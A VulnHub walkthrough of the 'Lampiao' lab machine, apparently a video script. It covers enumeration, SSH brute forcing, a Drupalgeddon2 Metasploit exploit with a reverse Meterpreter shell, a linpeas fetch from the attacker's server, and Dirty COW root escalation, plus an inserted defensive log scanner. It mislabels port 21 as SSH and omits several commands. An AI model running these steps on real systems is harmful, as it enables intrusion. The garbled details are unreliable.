Hello everyone! Welcome to my new video.
Today, we're exploring a vulnerable machine called "Lampiao". This
machine is part of a single series on VulnHub, rated as Easy in terms
of difficulty.
To get started, head over to the VulnHub website and download the vulnerable image for "Lampiao".
If you're
new to VulnHub, be sure to check out our VulnHub playlist for helpful videos
that will guide you through the process.
Let's dive in and see how we can exploit
this machine!
Setting Up
Once you've downloaded the image, the next
step is setting up the server in VirtualBox.
The downloaded image is in the
form of a ZIP file, so the process involves extracting the ZIP file and
installing it by creating a new VM.
First, we need to extract the ZIP file
using WinRAR. After extraction, I discovered several helpful files, including
the VMDK files.
Our next step involves creating a new virtual machine. In VirtualBox, click on "New" to
create a new VM.
Name it "Lampiao" and select the operating system
type as Linux. Set the version to "Other Linux 64-bit," since we are
unsure of the exact distribution.
Proceed by allocating RAM for your VM and
click "Next."
Select "Use an existing virtual hard disk file"
and import the VMDK file extracted earlier.
After clicking "Next," click on
"Finish" to complete the setup.
Once the import is finished, you'll
see the "Lampiao" vulnerable machine in the VirtualBox manager. For
better organization, let me regroup it into the VulnHub group.
Now, change the Network adapter to
"Host-Only."
It's important to ensure that both your Kali Linux
machine (used for attacks) and the vulnerable machine are connected to the same
network, so make sure they're both connected via the host-only adapter.
Next, attempt to start the VM to check if
it works, and you'll notice that our vulnerable machine is ready, with a
login prompt awaiting.
Let's dive into the fun!
Enumeration
Identify the IP address
The initial step in our attack is
enumeration, which involves identifying the IP address of our target machine
using NetDiscover. To execute this, open a terminal and run "netdiscover -i" followed by the name of the network interface, which in this
case is "eth1."
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.99.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
From the scan results, we've obtained our
target IP address: "192.168.95.21."
Conduct Network Scan to identify Open Ports
Next, we'll conduct a network scan to
identify open ports, a crucial step in the enumeration process. This helps us
understand the attack surface and strategize targeted attacks. We'll use the
popular Nmap tool for this task.
nmap -sC -sV {Specify the IP Address}
In this command,
"-sC" is used to perform a script scan using the default set
of scripts,
while "-sV" enables version detection, allowing us
to identify which versions are running on which port.
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.21
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 06:52 IST
1 service was unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.03 seconds
┌──(kali㉿kali)-[~]
└─$
After completing the network scan, we
identified 2 open ports:
Port 21 TCP: This indicates an SSH service
is running on the target machine. Accessing this service with valid credentials
would allow us to log in successfully.
Port 80 TCP: This port is running an HTTP
service. Nmap couldn't identify the specific web service running on it,
suggesting it might be a custom web server or one with a very basic
configuration.
Web Enumeration Port 80
Now, let's explore the content of the
website running on Port 80. To look at the contents ourselves, open a web
browser of your choice, and navigate to the target’s IP address in the URL bar
at the top of the window.
This webpage contains only plain text-based (ASCII) content. There don't appear to
be any vulnerabilities here, meaning this area isn't suitable for further
escalation.
For further escalation, let me check whether any other ports are open by
running Nmap against all ports.
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.21 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 06:54 IST
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.10 seconds
┌──(kali㉿kali)-[~]
└─$
Nmap reveals that there is another open
port:
Port 1898 TCP: This port is running an
Apache HTTP Server (version 2.4.7) and is hosting a Drupal 7 content management
system (CMS). The website is titled "Lampiäo."
Web Enumeration Port 1898
To explore the content on Port 1898, enter
the target's IP address in your web browser's URL bar, followed by a colon and
the port number.
Upon accessing the website, you will see a
page titled "Lampião." This page appears to be a discussion or
informational site about Lampião, a notable historical figure in Brazil.
The main section of the page features an
article titled "Lampião, herói ou vilão do Sertão?" which translates
to "Lampião, hero or villain of the Sertão?"
This article, posted by
a user named Tiago on April 19, 2018, delves into the controversial legacy of
Lampião. It examines how Lampião is viewed both as an idol by some and as a
murderer by others. The article emphasizes the dual nature of his reputation,
noting that Lampião, a highly enigmatic figure in Brazilian history, was both
feared and admired by those he affected. It invites readers to explore his
complex story further.
Additionally, the website includes sections
for users to log in, create a new account, or request a new password.
This
suggests that the website might offer interactive or personalized features for
registered users.
Below the main article, there is another
entry titled "First article..." posted by a user named Eder on April
20, 2018.
This entry seems to be a test post, featuring a brief message, a
reference to an audio file named "LuizGonzaga-LampiaoFalou.mp3," and
a note indicating that "Node 2 is not working."
Upon analyzing the website content, I came
up with two ideas to gain a foothold on the target system.
The first is to brute force the login to obtain a username and
password.
The second method is more reliable and logical, as it involves
exploiting a vulnerability in the target system.
Foothold
Method 1: Try to brute force to obtain the credential
Let's explore how we can gain a foothold
using the first method:
Upon analyzing the website, I discovered
that there are two users, Tiago and Eder, who participate in writing the blogs.
These names appear to be potential usernames for the target system. To attempt to find their login credentials,
we can use Hydra against the SSH service. First, we have to save the usernames to a
file named, “username.txt”.
Next, we need a password wordlist. For
this, we will use CeWL.
CeWL is
a Ruby application that spiders a given URL up to a specified depth and returns
a list of words that can be used for password cracking.
To see the various options for building a
wordlist, run:
┌──(kali㉿kali)-[~]
└─$ cewl --help
CeWL 6.1 (Max Length) Robin Wood ([email protected]) (https://digi.ninja/)
Usage: cewl [OPTIONS] ... <url>
OPTIONS:
-h, --help: Show help.
-k, --keep: Keep the downloaded file.
-d <x>,--depth <x>: Depth to spider to, default 2.
-m, --min_word_length: Minimum word length, default 3.
-x, --max_word_length: Maximum word length, default unset.
-o, --offsite: Let the spider visit other sites.
--exclude: A file containing a list of paths to exclude
--allowed: A regex pattern that path must match to be followed
-w, --write: Write the output to the file.
-u, --ua <agent>: User agent to send.
-n, --no-words: Don't output the wordlist.
-g <x>, --groups <x>: Return groups of words as well
--lowercase: Lowercase all parsed words
--with-numbers: Accept words with numbers in as well as just letters
--convert-umlauts: Convert common ISO-8859-1 (Latin-1) umlauts (ä-ae, ö-oe, ü-ue, ß-ss)
-a, --meta: include meta data.
--meta_file file: Output file for meta data.
-e, --email: Include email addresses.
--email_file <file>: Output file for email addresses.
--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
-c, --count: Show the count for each word found.
-v, --verbose: Verbose.
--debug: Extra debug information.
Authentication
--auth_type: Digest or basic.
--auth_user: Authentication username.
--auth_pass: Authentication password.
Proxy Support
--proxy_host: Proxy host.
--proxy_port: Proxy port, default 8080.
--proxy_username: Username for proxy, if required.
--proxy_password: Password for proxy, if required.
Headers
--header, -H: In format name:value - can pass multiple.
<url>: The site to spider.
┌──(kali㉿kali)-[~]
└─$
Now, use CeWL to generate a wordlist by specifying
the URL, and the -w option to save the words to a
file. Feeding the username file and the generated wordlist to Hydra against the SSH service produces the following output.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-25 09:23:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1688 login tries (l:2/p:844), ~106 tries per task
I do not prioritize this method because the
main objective is to demonstrate the exploitation of the Drupal CMS. Therefore,
let's focus on exploiting the vulnerability to gain a foothold on the server.
Method 2: Exploiting the vulnerability
We previously identified that the web
server is running a Drupal 7 content management system (CMS), which was confirmed
using Wappalyzer.
Given that this version of Drupal is outdated, it is likely
to have known vulnerabilities. Let’s investigate further to see if we can
exploit any of these vulnerabilities.
There is a tool called Searchsploit that is commonly
used to search for exploits offline, without needing an internet connection.
Searchsploit is a command-line utility that allows you to search the Exploit
Database (EDB) for information on exploits and vulnerabilities.
When we use Searchsploit to search for
Drupal-related exploits, particularly for Drupal 7, it will provide a list of
various exploits and vulnerabilities.
These exploits, including the notable
'Drupalgeddon' series, represent critical vulnerabilities that can allow us to
gain full control of a Drupal website. The exploits cover multiple attack
vectors such as SQL injection, remote code execution, cross-site scripting, and
arbitrary file upload.
Some of these vulnerabilities are integrated into
frameworks like Metasploit, which means they can be exploited using automated
tools.
Additionally, certain vulnerabilities are specific to particular Drupal
modules.
In this session, we will use the Drupalgeddon2 Remote Code Execution
vulnerability to gain access to the target system.
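Before moving to the exploitation steps, here is the defender's side of the same bug, as an added example that is not part of the original walkthrough or of Drupal/Metasploit: a small Python scanner that flags Drupalgeddon2-style requests in Apache access logs. The indicator it looks for (a '#'-prefixed Form API property smuggled in through request parameters) is my reading of SA-CORE-2018-002, and the log lines are constructed.

```python
"""Flag Drupalgeddon2-style (SA-CORE-2018-002) requests in Apache access logs.

Added example; not from the original post, Drupal or Metasploit.
Drupal render array properties are array keys beginning with '#', and unpatched
Drupal 7/8 let request parameters carry such keys into the Forms API. The
detector therefore flags '#'-prefixed keys (or '#' inside element_parents) in
the request target, the same class of input the upstream fix strips.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format; only the request line is needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed log lines: a benign password-reset visit, a Drupal 7 style attempt
# (Form API property under a bracketed parameter name), a Drupal 8 style attempt
# (element_parents pointing at a '#' property) and an unrelated page view.
SAMPLE_LOG = """\
192.168.95.3 - - [25/May/2024:09:08:40 +0530] "GET /?q=user/password HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.95.3 - - [25/May/2024:09:08:44 +0530] "POST /?q=user/password&name%5B%23type%5D=markup&name%5B%23markup%5D=test HTTP/1.1" 200 1650 "-" "python-requests/2.31"
192.168.95.3 - - [25/May/2024:09:08:45 +0530] "POST /user/password?element_parents=account/mail/%23value&_wrapper_format=drupal_ajax HTTP/1.1" 200 0 "-" "python-requests/2.31"
10.0.2.4 - - [25/May/2024:09:10:01 +0530] "GET /node/1 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
"""


def suspicious_params(target):
    """Return (key, value) pairs in the query string that carry a Form API property."""
    query = urlsplit(target).query
    hits = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded once; a second unquote catches double encoding.
        key = unquote(key)
        value = unquote(value)
        if key.startswith('#') or '[#' in key:
            hits.append((key, value))
        elif key == 'element_parents' and '#' in value:
            hits.append((key, value))
    return hits


def scan_log(text):
    """Return (ip, timestamp, method, target, hits) for every flagged log line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = suspicious_params(m['target'])
        if hits:
            findings.append((m['ip'], m['ts'], m['method'], m['target'], hits))
    return findings


if __name__ == '__main__':
    for ip, ts, method, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {method} {target}")
        for key, value in hits:
            print(f"    Form API property in request: {key!r} = {value!r}")
```

Only the query string is visible in access logs, so a POST whose injected keys sit in the body will not be caught here; pairing this with a WAF or Drupal's own request sanitizer covers that case.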
Exploit Drupal CMS using MSF Console
This process involves using
the Metasploit Framework.
Launch the Metasploit Console (MSF console).
This initializes the Metasploit database and starts the Metasploit console.
$ sudo msfdb init && msfconsole
[sudo] password for kali:
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: Use the edit command to open the currently active module
Once
the MSFconsole is launched, use the search command to find the Drupalgeddon2 exploit.
This command lists all matching modules related to Drupalgeddon2.
msf6 > search Drupalgeddon2
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
1 \_ target: Automatic (PHP In-Memory) . . . .
2 \_ target: Automatic (PHP Dropper) . . . .
3 \_ target: Automatic (Unix In-Memory) . . . .
4 \_ target: Automatic (Linux Dropper) . . . .
5 \_ target: Drupal 7.x (PHP In-Memory) . . . .
6 \_ target: Drupal 7.x (PHP Dropper) . . . .
7 \_ target: Drupal 7.x (Unix In-Memory) . . . .
8 \_ target: Drupal 7.x (Linux Dropper) . . . .
9 \_ target: Drupal 8.x (PHP In-Memory) . . . .
10 \_ target: Drupal 8.x (PHP Dropper) . . . .
11 \_ target: Drupal 8.x (Unix In-Memory) . . . .
12 \_ target: Drupal 8.x (Linux Dropper) . . . .
13 \_ AKA: SA-CORE-2018-002 . . . .
14 \_ AKA: Drupalgeddon 2 . . . .
Interact with a module by name or index. For example info 14, use 14 or use exploit/unix/webapp/drupal_drupalgeddon2
msf6 >
Let’s select the first module from the
search results using the use command.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/drupal_drupalgeddon2) >
The Key options include:
RHOSTS (the target
host),
RPORT (the target port),
TARGETURI (the path to the Drupal install), and
LHOST (the local host for the reverse connection).
Now, let’s configure the target host IP
address (192.168.95.21), and set the target port to 1898,
which is where the vulnerable Drupal instance is running.
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.95.21
RHOSTS => 192.168.95.21
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
RPORT => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.95.3
LHOST => 192.168.95.3
msf6 exploit(unix/webapp/drupal_drupalgeddon2) >
Now, we will set the local IP address where
the Metasploit instance will listen for the reverse connection.
If you don’t
know your Local IP address, then use the ifconfig command.
Now, let’s run the exploit command to
gain a foothold on the target system, which will lead to further escalation.
[*] Started reverse TCP handler on 192.168.95.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.95.21
[*] Meterpreter session 1 opened (192.168.95.3:4444 -> 192.168.95.21:55260) at 2024-05-25 09:08:46 +0530
meterpreter >
After running
the exploit command, the Metasploit Framework automatically checked the target
system and confirmed it was vulnerable. The exploit was successful, and the
payload was executed, establishing a Meterpreter session. This means we now have remote control over the target system through the Meterpreter shell.
Next, we need to switch from the Meterpreter session to a standard shell session so that we can execute system commands directly. However, the shell we get is not a fully
interactive command line interface.
To confirm that the shell works, I ran a command to check
the current user ID. This confirmed that the shell operates under the www-data
user account, which is a low-privilege account typically used by web servers.
Let’s upgrade the shell to make it more
interactive. We’ll use Python to spawn an interactive Bash shell. First, check
which Python version is available on the target system by running "which
python".
Then, use Python to start a new Bash shell
with the following command. This command provides a more stable and functional
shell environment.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@lampiao:/var/www/html$
Next, we need to locate the user flag.
Begin by navigating to the home directory and listing its contents.
www-data@lampiao:/var/www/html$ cd /home
cd /home
www-data@lampiao:/home$ ls
ls
tiago
www-data@lampiao:/home$
In the home directory, I found a directory
named tiago. This directory appears to belong to the user tiago. Change into this directory.
However, I couldn’t find the user flag
here. It’s possible that the root flag might be located in the root directory.
Attempting to navigate to the root directory.
www-data@lampiao:/home/tiago$ cd /root
cd /root
bash: cd: /root: Permission denied
www-data@lampiao:/home/tiago$
I encountered a "Permission
denied" error, indicating that the current user does not have sufficient
privileges to access this directory.
The next step is to identify any files or
directories that might contain useful information for privilege escalation.
Privilege Escalation
During the privilege escalation process,
our primary goal is to gather system information and identify any
vulnerabilities or misconfigurations that could provide elevated privileges,
ultimately allowing us to gain root access.
Previously, we found that our current user lacks the
permissions needed to enumerate user rights and privileges on the system
directly.
Escalate the Privileges using LinPEAS
To proceed with privilege escalation
directly from our current position, we can use a tool like LinPEAS.
LinPEAS is
a script that helps automate the process of identifying potential weaknesses in
the system that could be exploited for privilege escalation.
First, we need the LinPEAS script, which can be downloaded from GitHub, and then send it to the target system.
Next,
we need to transfer the LinPEAS script to the target system. To do this, we can
set up a simple HTTP server on our machine to serve the script.
Use Python to create an HTTP server to host
the LinPEAS script. Run the following command in the directory where the
LinPEAS script is located.
This will start an HTTP server on port 8000. Ensure
this port is accessible from the target system.
┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Once the HTTP server is running, change the directory to /tmp in the target
shell.
www-data@lampiao:/home/tiago$ cd /tmp
cd /tmp
www-data@lampiao:/tmp$
Download the linpeas.sh file from our HTTP server using the wget command.
Then list all files and directories to
verify whether linpeas.sh has execute permissions. It does not, so we will
need to modify the permissions. To make linpeas.sh executable, use the chmod
command.
www-data@lampiao:/tmp$ ls -al
ls -al
total 852
drwxrwxrwt 2 root root 4096 May 25 00:41 .
drwxr-xr-x 21 root root 4096 Apr 19 2018 ..
-rw-r--r-- 1 www-data www-data 862779 May 21 18:00 linpeas.sh
www-data@lampiao:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@lampiao:/tmp$
Next, run linpeas.sh
to perform a comprehensive scan of the system for privilege escalation
opportunities.
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
The script will examine various aspects of the system, including
misconfigurations, outdated or vulnerable software versions, and other security
weaknesses that could be exploited to gain higher privileges:
Local Privilege Escalation (CVE-2016-5195_dirtycow 2)
After analyzing the output, I discovered
that the target system is vulnerable to a Local Privilege Escalation (LPE)
attack. Among various scripts tested, I identified a suitable vulnerability to
exploit: CVE-2016-5195, also known as the "Dirty COW" vulnerability.
Upon execution, we obtained a root shell,
which I confirmed using the whoami command. Since we have a root shell, let’s
change the directory to the root and check if we can find the root flag.